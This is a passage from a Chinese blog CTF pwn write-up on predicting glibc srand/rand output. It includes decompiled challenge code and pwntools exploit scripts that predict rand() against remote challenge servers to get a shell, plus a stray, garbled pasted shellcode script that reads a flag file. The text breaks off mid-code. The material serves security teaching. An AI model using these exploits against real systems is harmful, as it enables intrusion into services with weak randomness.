<!DOCTYPE html>
<html lang="zh-CH">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="keywords" content="downbeat">
    
    <meta name="author" content="D0wnBe@t">
    <!-- preconnect -->
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>

    
    <!--- Seo Part-->
    
    <link rel="canonical" href="http://downbeat.top/2024/10/14/随机数专题/"/>
    <meta name="robots" content="index,follow">
    <meta name="googlebot" content="index,follow">
    <meta name="revisit-after" content="1 days">
    
        <meta name="description" content="什么是伪随机？对于基本的随机数生成，比如说 123srand randsrandom random# 位于stdlib头文件里面  这两个函数的随机数生成都基于时间种子seed，通常来说，只要glibc相同，seed相同，那么所生成的随机数就是一样的。 下面简单介绍一下随机数生产的代码123456789#include &lt;stdio.h&gt;#include &lt;stdlib.h&amp;gt">
<meta property="og:type" content="article">
<meta property="og:title" content="随机数专题">
<meta property="og:url" content="http://downbeat.top/2024/10/14/%E9%9A%8F%E6%9C%BA%E6%95%B0%E4%B8%93%E9%A2%98/index.html">
<meta property="og:site_name" content="D0wnBe@t">
<meta property="og:description" content="什么是伪随机？对于基本的随机数生成，比如说 123srand randsrandom random# 位于stdlib头文件里面  这两个函数的随机数生成都基于时间种子seed，通常来说，只要glibc相同，seed相同，那么所生成的随机数就是一样的。 下面简单介绍一下随机数生产的代码123456789#include &lt;stdio.h&gt;#include &lt;stdlib.h&amp;gt">
<meta property="og:locale" content="zh_CH">
<meta property="og:image" content="http://downbeat.top/capture_20241014131824312.bmp">
<meta property="og:image" content="http://downbeat.top/capture_20241014131837873.bmp">
<meta property="og:image" content="http://downbeat.top/capture_20241014131854890.bmp">
<meta property="article:published_time" content="2024-10-14T03:54:21.000Z">
<meta property="article:modified_time" content="2024-11-06T05:05:25.339Z">
<meta property="article:author" content="downbeat">
<meta property="article:tag" content="ctf-pwn">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://downbeat.top/capture_20241014131824312.bmp">
    
    
    <!--- Icon Part-->
    <link rel="icon" type="image/png" href="/images/favicon.png" sizes="192x192">
    <link rel="apple-touch-icon" sizes="180x180" href="/images/favicon.png">
    <meta name="theme-color" content="#A31F34">
    <link rel="shortcut icon" href="/images/favicon.png">
    <!--- Page Info-->
    
    <title>
        
            随机数专题 | D0wnBe@t
        
    </title>

    
<link rel="stylesheet" href="/fonts/Chillax/chillax.css">


    <!--- Inject Part-->
    

    
<link rel="stylesheet" href="/css/style.css">


    
        
<link rel="stylesheet" href="/assets/build/styles.css">

    

    
<link rel="stylesheet" href="/fonts/GeistMono/geist-mono.css">

    
<link rel="stylesheet" href="/fonts/Geist/geist.css">

    <!--- Font Part-->
    
    
    
        <link href="" rel="stylesheet">
    
    
    
    

    <script id="hexo-configurations">
    window.config = {"hostname":"downbeat.top","root":"/","language":"zh-CH","path":"search.xml"};
    window.theme = {"articles":{"style":{"font_size":"16px","line_height":1.5,"image_border_radius":"14px","image_alignment":"center","image_caption":false,"link_icon":true,"title_alignment":"left","headings_top_spacing":{"h1":"3.2rem","h2":"2.4rem","h3":"1.9rem","h4":"1.6rem","h5":"1.4rem","h6":"1.3rem"}},"word_count":{"enable":true,"count":true,"min2read":true},"author_label":{"enable":true,"auto":false,"list":[]},"code_block":{"copy":true,"style":"mac","highlight_theme":{"light":"github","dark":"vs2015"},"font":{"enable":false,"family":null,"url":null}},"toc":{"enable":true,"max_depth":3,"number":false,"expand":true,"init_open":true},"copyright":{"enable":true,"default":"cc_by_nc_sa"},"lazyload":true,"recommendation":{"enable":false,"title":"推荐阅读","limit":3,"mobile_limit":2,"placeholder":"/images/wallhaven-wqery6-light.webp","skip_dirs":[]}},"colors":{"primary":"#A31F34","secondary":null,"default_mode":"light"},"global":{"fonts":{"chinese":{"enable":true,"family":null,"url":null},"english":{"enable":false,"family":null,"url":null},"title":{"enable":false,"family":null,"url":null}},"content_max_width":"1000px","sidebar_width":"300px","hover":{"shadow":true,"scale":false},"scroll_progress":{"bar":false,"percentage":true},"website_counter":{"url":"https://cn.vercount.one/js","enable":true,"site_pv":true,"site_uv":true,"post_pv":true},"single_page":true,"preloader":{"enable":false,"custom_message":null},"open_graph":true,"google_analytics":{"enable":false,"id":null}},"home_banner":{"enable":true,"style":"fixed","image":{"light":"/images/Linux-user-Room.png","dark":"/images/wallhaven-wqery6-dark.webp"},"title":"Dream of Full Stack","subtitle":{"text":["keep going"],"hitokoto":{"enable":false,"show_author":false,"api":"https://v1.hitokoto.cn"},"typing_speed":100,"backing_speed":80,"starting_delay":500,"backing_delay":1500,"loop":true,"smart_backspace":true},"text_color":{"light":"#fff","dark":"#d1d1b6"},"text_style":{"title_size":"2.8rem","subtitle_size":"1.5rem","line_height":1.2},"custom_font":{"enable":false,"family":null,"url":null},"social_links":{"enable":false,"style":"default","links":{"github":null,"instagram":null,"zhihu":null,"twitter":null,"email":null},"qrs":{"weixin":null}}},"plugins":{"feed":{"enable":false},"aplayer":{"enable":false,"type":"fixed","audios":[{"name":null,"artist":null,"url":null,"cover":null,"lrc":null}]},"mermaid":{"enable":false,"version":"9.3.0"}},"version":"2.7.3","navbar":{"auto_hide":false,"color":{"left":"#f78736","right":"#367df7","transparency":35},"width":{"home":"1200px","pages":"1000px"},"search":{"enable":true,"preload":true}},"page_templates":{"friends_column":2,"tags_style":"blur"},"home":{"sidebar":{"enable":true,"position":"left","first_item":"menu","announcement":null,"show_on_mobile":true,"links":null},"article_date_format":"auto","excerpt_length":200,"categories":{"enable":true,"limit":3},"tags":{"enable":true,"limit":3}},"footerStart":"2022/8/17 11:45:14"};
    window.lang_ago = {"second":"%s seconds ago","minute":"%s minutes ago","hour":"%s hours ago","day":"%s days ago","week":"%s weeks ago","month":"%s months ago","year":"%s years ago"};
    window.data = {"masonry":false};
  </script>
    
    <!--- Fontawesome Part-->
    
<link rel="stylesheet" href="/fontawesome/fontawesome.min.css">

    
<link rel="stylesheet" href="/fontawesome/brands.min.css">

    
<link rel="stylesheet" href="/fontawesome/solid.min.css">

    
<link rel="stylesheet" href="/fontawesome/regular.min.css">

    
    
    
    
<meta name="generator" content="Hexo 5.4.2"></head>


<body>
<div class="progress-bar-container">
    

    
        <span class="pjax-progress-bar"></span>
<!--        <span class="swup-progress-icon">-->
<!--            <i class="fa-solid fa-circle-notch fa-spin"></i>-->
<!--        </span>-->
    
</div>



<main class="page-container" id="swup">

    

    <div class="main-content-container flex flex-col justify-between min-h-dvh">


        <div class="main-content-header">
            <header class="navbar-container px-6 md:px-12">
    <div class="navbar-content transition-navbar ">
        <div class="left">
            
            <a class="logo-title" href="/">
                
                D0wnBe@t
                
            </a>
        </div>

        <div class="right">
            <!-- PC -->
            <div class="desktop">
                <ul class="navbar-list">
                    
                    
                        <li class="navbar-item search search-popup-trigger">
                            <i class="fa-solid fa-magnifying-glass"></i>
                        </li>
                    
                </ul>
            </div>
            <!-- Mobile -->
            <div class="mobile">
                
                    <div class="icon-item search search-popup-trigger"><i class="fa-solid fa-magnifying-glass"></i>
                    </div>
                
                <div class="icon-item navbar-bar">
                    <div class="navbar-bar-middle"></div>
                </div>
            </div>
        </div>
    </div>

    <!-- Mobile sheet -->
    <div class="navbar-drawer h-dvh w-full absolute top-0 left-0 bg-background-color flex flex-col justify-between">
        <ul class="drawer-navbar-list flex flex-col px-4 justify-center items-start">
            

            
            
        </ul>

        <div class="statistics flex justify-around my-2.5">
    <a class="item tag-count-item flex flex-col justify-center items-center w-20" href="/tags">
        <div class="number text-2xl sm:text-xl text-second-text-color font-semibold">9</div>
        <div class="label text-third-text-color text-sm">Tags</div>
    </a>
    <a class="item tag-count-item flex flex-col justify-center items-center w-20" href="/categories">
        <div class="number text-2xl sm:text-xl text-second-text-color font-semibold">0</div>
        <div class="label text-third-text-color text-sm">Categories</div>
    </a>
    <a class="item tag-count-item flex flex-col justify-center items-center w-20" href="/archives">
        <div class="number text-2xl sm:text-xl text-second-text-color font-semibold">32</div>
        <div class="label text-third-text-color text-sm">Posts</div>
    </a>
</div>
    </div>

    <div class="window-mask"></div>

</header>


        </div>

        <div class="main-content-body">

            

            <div class="main-content">

                
                    <div class="post-page-container flex relative justify-between box-border w-full h-full">
    <div class="article-content-container">

        <div class="article-title relative w-full">
            
                <div class="w-full flex items-center pt-6 justify-start">
                    <h1 class="article-title-regular text-second-text-color tracking-tight text-4xl md:text-6xl font-semibold px-2 sm:px-6 md:px-8 py-3">随机数专题</h1>
                </div>
            
            </div>

        
            <div class="article-header flex flex-row gap-2 items-center px-2 sm:px-6 md:px-8">
                <div class="avatar w-[46px] h-[46px] flex-shrink-0 rounded-medium border border-border-color p-[1px]">
                    <img src="/images/avatar2.jpg">
                </div>
                <div class="info flex flex-col justify-between">
                    <div class="author flex items-center">
                        <span class="name text-default-text-color text-lg font-semibold">D0wnBe@t</span>
                        
                            <span class="author-label ml-1.5 text-xs px-2 py-0.5 rounded-small text-third-text-color border border-shadow-color-1">Lv4</span>
                        
                    </div>
                    <div class="meta-info">
                        <div class="article-meta-info">
    <span class="article-date article-meta-item">
        <i class="fa-regular fa-pen-fancy"></i>&nbsp;
        <span class="desktop">2024-10-14 11:54:21</span>
        <span class="mobile">2024-10-14 11:54:21</span>
        <span class="hover-info">Created</span>
    </span>
    
        <span class="article-date article-meta-item">
            <i class="fa-regular fa-wrench"></i>&nbsp;
            <span class="desktop">2024-11-06 13:05:25</span>
            <span class="mobile">2024-11-06 13:05:25</span>
            <span class="hover-info">Updated</span>
        </span>
    

    
    
        <span class="article-tags article-meta-item">
            <i class="fa-regular fa-tags"></i>&nbsp;
            <ul>
                
                    <li>
                        <a href="/tags/ctf-pwn/">ctf-pwn</a>&nbsp;
                    </li>
                
            </ul>
        </span>
    

    
    
        <span class="article-wordcount article-meta-item">
            <i class="fa-regular fa-typewriter"></i>&nbsp;<span>2.9k Words</span>
        </span>
    
    
        <span class="article-min2read article-meta-item">
            <i class="fa-regular fa-clock"></i>&nbsp;<span>13 Mins</span>
        </span>
    
    
        <span class="article-pv article-meta-item">
            <i class="fa-regular fa-eye"></i>&nbsp;<span id="busuanzi_value_page_pv"></span>
        </span>
    
</div>

                    </div>
                </div>
            </div>
        

        


        <div class="article-content markdown-body px-2 sm:px-6 md:px-8 pb-8">
            <h1 id="什么是伪随机？"><a href="#什么是伪随机？" class="headerlink" title="什么是伪随机？"></a>什么是伪随机？</h1><p>对于基本的随机数生成，比如说</p>
<div class="highlight-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">srand rand</span><br><span class="line">srandom random</span><br><span class="line"><span class="comment"># 位于stdlib头文件里面</span></span><br></pre></td></tr></table></figure></div>

<p>这两个函数的随机数生成都基于时间种子seed，通常来说，只要glibc相同，seed相同，那么所生成的随机数就是一样的。</p>
<h2 id="下面简单介绍一下随机数生产的代码"><a href="#下面简单介绍一下随机数生产的代码" class="headerlink" title="下面简单介绍一下随机数生产的代码"></a>下面简单介绍一下随机数生产的代码</h2><div class="highlight-container" data-rel="C"><figure class="iseeu highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;time.h&gt;</span></span></span><br><span class="line"><span class="type">int</span> <span class="title function_">main</span><span class="params">(<span class="type">void</span>)</span></span><br><span class="line">&#123;</span><br><span class="line">	<span class="built_in">printf</span>(<span class="string">&quot;the first random num is %d\n&quot;</span>,rand()%<span class="number">100</span>);</span><br><span class="line">	srand(<span class="number">1</span>); </span><br><span class="line">	<span class="built_in">printf</span>(<span class="string">&quot;if the seed is 1 , the random num is %d\n&quot;</span>,rand()%<span class="number">100</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></div>

<div class="highlight-container" data-rel="C"><figure class="iseeu highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">the first random num is <span class="number">83</span></span><br><span class="line"><span class="keyword">if</span> the seed is <span class="number">1</span> , the random num is <span class="number">83</span></span><br></pre></td></tr></table></figure></div>

<ul>
<li><p><mark>srand(1)中的1代表随机数的种子(seed)<mark></mark></mark></p>
</li>
<li><p>第一个random num和第二次设置随机数种子为1所产生的随机数是一样的，代表着不设置随机数那么默认的随机数种子就是1</p>
</li>
</ul>
<h2 id="伪随机的利用"><a href="#伪随机的利用" class="headerlink" title="伪随机的利用"></a>伪随机的利用</h2><ul>
<li>下图是在Ubuntu22.04的情况下运行同样的代码(上面是在ubuntu24.04运行)</li>
</ul>
<p><img lazyload src="/images/loading.svg" data-src="/../capture_20241014131824312.bmp"></p>
<p>可以发现产生的随机数是相同的，为什么呢？</p>
<p><img lazyload src="/images/loading.svg" data-src="/../capture_20241014131837873.bmp"></p>
<p><img lazyload src="/images/loading.svg" data-src="/../capture_20241014131854890.bmp"></p>
<p><mark>我们发现虽然是在不同的ubuntu版本，即glibc版本不同的环境下运行，但是程序所利用的libc版本和ld版本相同，算法相同，他们所产生的随机数依旧是相同的，这就是伪随机的概念<mark></mark></mark></p>
<ul>
<li>所以我们只需要找到相同的libc就可以掌握随机数，但是我们写pwn的脚本是拿python写的，在python下如何模拟c语言产生随机数呢，<mark>ctype库<mark></mark></mark></li>
<li>下面展示基本的利用(<a href="http://downbeat.top/2024/09/21/%E4%BC%AA%E9%9A%8F%E6%9C%BA-%E7%88%86%E7%A0%B4canary-%E7%88%86%E7%A0%B4PIE/">这篇文章</a>提到过)</li>
</ul>
<div class="highlight-container" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> ctypes <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">libc = cdll.LoadLibrary(<span class="string">&quot;/lib/x86_64-linux-gnu/libc.so.6&quot;</span>) <span class="comment"># 本地libc</span></span><br><span class="line">seed = libc.time(<span class="number">0</span>) <span class="comment"># 时间种子，0代表本地时间</span></span><br><span class="line">libc.srand(seed) </span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">10</span>):</span><br><span class="line">    num = libc.rand() % <span class="number">50</span></span><br><span class="line">    <span class="built_in">print</span>(num)</span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"><span class="string">srand 搭配 rand</span></span><br><span class="line"><span class="string">srandom 搭配 random</span></span><br><span class="line"><span class="string">前者安全性差</span></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br></pre></td></tr></table></figure></div>

<p>基本的介绍就到这里，下面看几个例题吧：</p>
<h1 id="例题"><a href="#例题" class="headerlink" title="例题"></a>例题</h1><h2 id="srand-rand"><a href="#srand-rand" class="headerlink" title="srand&#x2F;rand"></a>srand&#x2F;rand</h2><p><a class="link" target="_blank" rel="noopener" href="http://27.25.151.80:8000/games/2/challenges">题目链接 <i class="fa-regular fa-arrow-up-right-from-square fa-sm"></i></a></p>
<p>buildctf 你想成为沙威玛传奇吗</p>
<ul>
<li>主函数部分</li>
</ul>
<div class="highlight-container" data-rel="C"><figure class="iseeu highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">int</span> __cdecl <span class="title function_">main</span><span class="params">(<span class="type">int</span> argc, <span class="type">const</span> <span class="type">char</span> **argv, <span class="type">const</span> <span class="type">char</span> **envp)</span></span><br><span class="line">&#123;</span><br><span class="line">  initial(argc, argv, envp);</span><br><span class="line">  <span class="keyword">while</span> ( <span class="number">1</span> )</span><br><span class="line">  &#123;</span><br><span class="line">    menu();</span><br><span class="line">    fgets(num, <span class="number">4</span>, <span class="built_in">stdin</span>);</span><br><span class="line">    <span class="keyword">switch</span> ( atoi(num) )</span><br><span class="line">    &#123;</span><br><span class="line">      <span class="keyword">case</span> <span class="number">1</span>:</span><br><span class="line">        buy();</span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line">      <span class="keyword">case</span> <span class="number">2</span>:</span><br><span class="line">        eat();</span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line">      <span class="keyword">case</span> <span class="number">3</span>:</span><br><span class="line">        check();</span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line">      <span class="keyword">case</span> <span class="number">4</span>:</span><br><span class="line">        thief();</span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line">      <span class="keyword">case</span> <span class="number">5</span>:</span><br><span class="line">        beggar();</span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line">      <span class="keyword">default</span>:</span><br><span class="line">        <span class="built_in">printf</span>(<span class="string">&quot;go out&quot;</span>);</span><br><span class="line">        <span class="built_in">exit</span>(<span class="number">0</span>);</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></div>

<p>乍一看以为是堆题，但其实很简单。</p>
<ul>
<li>在eat函数中发现，只要Shawarma数量大于99就可以获得shell,而在beggar函数里面发现满足rand() &amp; 1&#x3D;&#x3D;0，就可以获得Shawarma。</li>
</ul>
<div class="highlight-container" data-rel="C"><figure class="iseeu highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">int</span> <span class="title function_">eat</span><span class="params">()</span></span><br><span class="line">&#123;</span><br><span class="line">  <span class="type">int</span> result; <span class="comment">// eax</span></span><br><span class="line"></span><br><span class="line">  <span class="built_in">puts</span>(&amp;byte_402190);</span><br><span class="line">  result = Shawarma;</span><br><span class="line">  <span class="keyword">if</span> ( Shawarma &gt; <span class="number">99</span> )</span><br><span class="line">    result = system(<span class="string">&quot;/bin/sh&quot;</span>);</span><br><span class="line">  Shawarma = <span class="number">0</span>;</span><br><span class="line">  <span class="keyword">return</span> result;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></div>

<div class="highlight-container" data-rel="C"><figure class="iseeu highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">__int64 <span class="title function_">beggar</span><span class="params">()</span></span><br><span class="line">&#123;</span><br><span class="line">  <span class="keyword">if</span> ( (rand() &amp; <span class="number">1</span>) != <span class="number">0</span> )</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="built_in">puts</span>(&amp;byte_402244);</span><br><span class="line">    <span class="keyword">return</span> (<span class="type">unsigned</span> <span class="type">int</span>)--money;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">else</span></span><br><span class="line">  &#123;</span><br><span class="line">    <span class="built_in">puts</span>(&amp;byte_402260);</span><br><span class="line">    <span class="keyword">return</span> (<span class="type">unsigned</span> <span class="type">int</span>)++Shawarma;</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></div>

<ul>
<li>x from pwn import *context(arch&#x3D;’amd64’,log_level&#x3D;’debug’)​#p &#x3D; process(“.&#x2F;pwn”)p &#x3D; remote(“challenge.basectf.fun”,30343)​def bug():    gdb.attach(p)    pause()​shellcode &#x3D; (‘’’    mov rax, 0x67616c662f2e     push rax    mov rsi, rsp    xor rax, rax    xor rdi, rdi    sub rdi, 100    xor rdx, rdx    mov r10, 7    mov rax, 0x101    syscall                    mov rdi,1    mov rsi,3       mov rdx,0    mov r10,0x100    push 40    pop rax    syscall ‘’’)​p.send(asm(shellcode))p.interactive()python</li>
</ul>
<div class="highlight-container" data-rel="C"><figure class="iseeu highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">void</span> <span class="title function_">initial</span><span class="params">()</span></span><br><span class="line">&#123;</span><br><span class="line">  <span class="type">unsigned</span> <span class="type">int</span> v0; <span class="comment">// eax</span></span><br><span class="line"></span><br><span class="line">  setvbuf(<span class="built_in">stdout</span>, <span class="number">0LL</span>, <span class="number">2</span>, <span class="number">0LL</span>);</span><br><span class="line">  setvbuf(<span class="built_in">stdin</span>, <span class="number">0LL</span>, <span class="number">2</span>, <span class="number">0LL</span>);</span><br><span class="line">  setvbuf(<span class="built_in">stderr</span>, <span class="number">0LL</span>, <span class="number">2</span>, <span class="number">0LL</span>);</span><br><span class="line">  v0 = time(<span class="number">0LL</span>);</span><br><span class="line">  srand(v0);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></div>

<h3 id="EXP"><a href="#EXP" class="headerlink" title="EXP"></a>EXP</h3><div class="highlight-container" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> ctype <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">import</span> time</span><br><span class="line">context(arch=<span class="string">&#x27;amd64&#x27;</span>,log_level=<span class="string">&#x27;debug&#x27;</span>)</span><br><span class="line"></span><br><span class="line">p = remote(<span class="string">&quot;27.25.151.80&quot;</span>,<span class="number">36122</span>)</span><br><span class="line">libc = cdll.LoadLibrary(<span class="string">&quot;libc.so.6&quot;</span>)</span><br><span class="line">seed = libc.time(<span class="number">0</span>)</span><br><span class="line">libc.srand(seed)</span><br><span class="line"></span><br><span class="line">cnt = <span class="number">0</span></span><br><span class="line"><span class="keyword">while</span> (cnt &lt; <span class="number">100</span>):</span><br><span class="line">    p.recv()</span><br><span class="line">    num = libc.rand() &amp; <span class="number">1</span></span><br><span class="line">    <span class="keyword">if</span> num == <span class="number">0</span>:</span><br><span class="line">        p.sendline(<span class="built_in">str</span>(<span class="number">5</span>))</span><br><span class="line">        cnt += <span class="number">1</span></span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        p.sendline(<span class="built_in">str</span>(<span class="number">4</span>))</span><br><span class="line"></span><br><span class="line">p.recv()</span><br><span class="line">p.sendline(<span class="built_in">str</span>(<span class="number">2</span>))</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br><span class="line"></span><br></pre></td></tr></table></figure></div>

<h2 id="srandom-localtime"><a href="#srandom-localtime" class="headerlink" title="srandom&#x2F;localtime"></a>srandom&#x2F;localtime</h2><p>题目：<code>moectf2024 这是什么？random!</code></p>
<ul>
<li>核心点</li>
</ul>
<div class="highlight-container" data-rel="C"><figure class="iseeu highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">timer = time(<span class="number">0LL</span>);</span><br><span class="line">v3 = localtime(&amp;timer);</span><br><span class="line">srandom(v3-&gt;tm_yday);</span><br><span class="line"><span class="built_in">puts</span>(<span class="string">&quot;Let&#x27;s play a number guessing game.&quot;</span>);</span><br><span class="line"><span class="keyword">while</span> ( tests-- )</span><br><span class="line">&#123;</span><br><span class="line">  secret = random() % <span class="number">90000</span> + <span class="number">10000</span>;</span><br><span class="line">  <span class="built_in">printf</span>(<span class="string">&quot;Guess a five-digit number I&#x27;m thinking of\n&gt; &quot;</span>);</span><br><span class="line">  fflush(<span class="built_in">stdout</span>);</span><br><span class="line">  __isoc99_scanf(<span class="string">&quot;%u&quot;</span>, &amp;guess);</span><br><span class="line">  <span class="keyword">if</span> ( guess != secret )</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">&quot;Wrong.&quot;</span>);</span><br><span class="line">    <span class="built_in">exit</span>(<span class="number">1</span>);</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">&quot;Wow, you are right!&quot;</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></div>

<p>下面是关于<code>localtime和tm_yday的解释</code></p>
<blockquote>
<h3 id="代码解释"><a href="#代码解释" class="headerlink" title="代码解释"></a>代码解释</h3><div class="highlight-container" data-rel="C"><figure class="iseeu highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">timer = time(<span class="number">0LL</span>);</span><br></pre></td></tr></table></figure></div>

<ul>
<li><code>time(0LL)</code> 或者 <code>time(NULL)</code> 返回的是当前的 UNIX 时间戳（从 1970 年 1 月 1 日 00:00:00 UTC 到现在的秒数）。这个时间戳是一个 <code>time_t</code> 类型。</li>
<li><code>timer</code> 变量存储了当前的时间戳。</li>
</ul>
<div class="highlight-container" data-rel="C"><figure class="iseeu highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">v3 = localtime(&amp;timer);</span><br></pre></td></tr></table></figure></div>

<ul>
<li><code>localtime(&amp;timer)</code> 将时间戳 <code>timer</code> 转换为本地时间，并返回一个指向 <code>struct tm</code> 结构体的指针。<code>struct tm</code> 包含了日期和时间的各个组成部分（年、月、日、时、分、秒等）。</li>
<li>v3是一个指向 <code>struct tm</code> 的指针，结构体中的一些字段包括：</li>
<li><code>tm_year</code>: 当前年（自 1900 年以来的年数）</li>
<li><code>tm_mon</code>: 当前月（从 0 到 11）</li>
<li><code>tm_mday</code>: 当前日</li>
<li><code>tm_yday</code>: 当前年中的第几天（从 0 到 365）</li>
</ul>
<div class="highlight-container" data-rel="C"><figure class="iseeu highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">srandom(v3-&gt;tm_yday);</span><br></pre></td></tr></table></figure></div>

<ul>
<li><code>srandom()</code> 是一个用于初始化随机数生成器的函数，类似于 <code>srand()</code>，但通常在某些系统中提供更强的随机性。它接收一个无符号整数作为种子，后续的随机数生成就基于这个种子。</li>
<li><code>v3-&gt;tm_yday</code> 是结构体 <code>tm</code> 中的一个字段，它表示当前日期在一年中的第几天（范围为 0 到 365）。这个值被用来作为种子。</li>
</ul>
</blockquote>
<ul>
<li>从本地时间中提取当前日期在一年中的第几天(tm_yday)作为随机数种子，算法是一样的模拟即可</li>
<li>后续代码不放出来了，还有两个随便输出什么都行，就可以获得flag了</li>
</ul>
<h3 id="EXP-1"><a href="#EXP-1" class="headerlink" title="EXP"></a>EXP</h3><div class="highlight-container" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span 